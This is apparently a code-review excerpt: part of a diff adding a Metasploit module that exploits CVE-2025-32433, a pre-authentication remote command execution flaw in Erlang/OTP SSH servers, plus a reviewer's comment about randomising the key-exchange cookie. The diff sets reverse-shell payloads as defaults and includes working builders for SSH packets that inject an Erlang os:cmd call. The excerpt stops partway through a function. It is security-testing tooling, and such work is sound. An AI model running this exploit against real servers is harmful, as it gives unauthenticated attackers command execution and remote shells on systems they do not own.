modules/exploits/linux/ssh/ssh_erlangotp_rce.rb

```diff
@@ -0,0 +1,261 @@
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Erlang OTP Pre-Auth RCE Scanner and Exploit',
+        'Description' => %q{
+          This module detect and exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH
+          servers that allows remote command execution. By sending crafted SSH packets, it executes a payload to
+          establish a reverse shell on the target system.
+
+          The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd`
+          function without requiring authentication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Horizon3 Attack Team',
+          'Matt Keeley', # PoC
+          'Martin Kristiansen', # PoC
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'References' => [
+          ['CVE', '2025-32433'],
+          ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
+          ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
+          ['URL', 'https://github.com/ProDefense/CVE-2025-32433']
+        ],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_CMD,
+              'Type' => :linux_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-04-16',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new('CHECK_ONLY', [false, 'Only check for vulnerability without exploiting', false])
+    ])
+  end
+
+  # builds SSH_MSG_CHANNEL_OPEN for session
+  def build_channel_open(channel_id)
+    "\x5a" +
+      string_payload('session') +
+      [channel_id].pack('N') +
+      [0x68000].pack('N') +
+      [0x10000].pack('N')
+  end
+
+  # builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
+  def build_channel_request(channel_id, command)
+    "\x62" +
+      [channel_id].pack('N') +
+      string_payload('exec') +
+      "\x01" +
+      string_payload("os:cmd(\"#{command}\").")
+  end
+
+  # builds a minimal but valid SSH_MSG_KEXINIT packet
+  def build_kexinit
+    cookie = "\x00" * 16
```

Comment:
According to [the spec](https://www.rfc-editor.org/rfc/rfc4253#page-17), the cookie is made of 16 random bytes, so this can be randomized.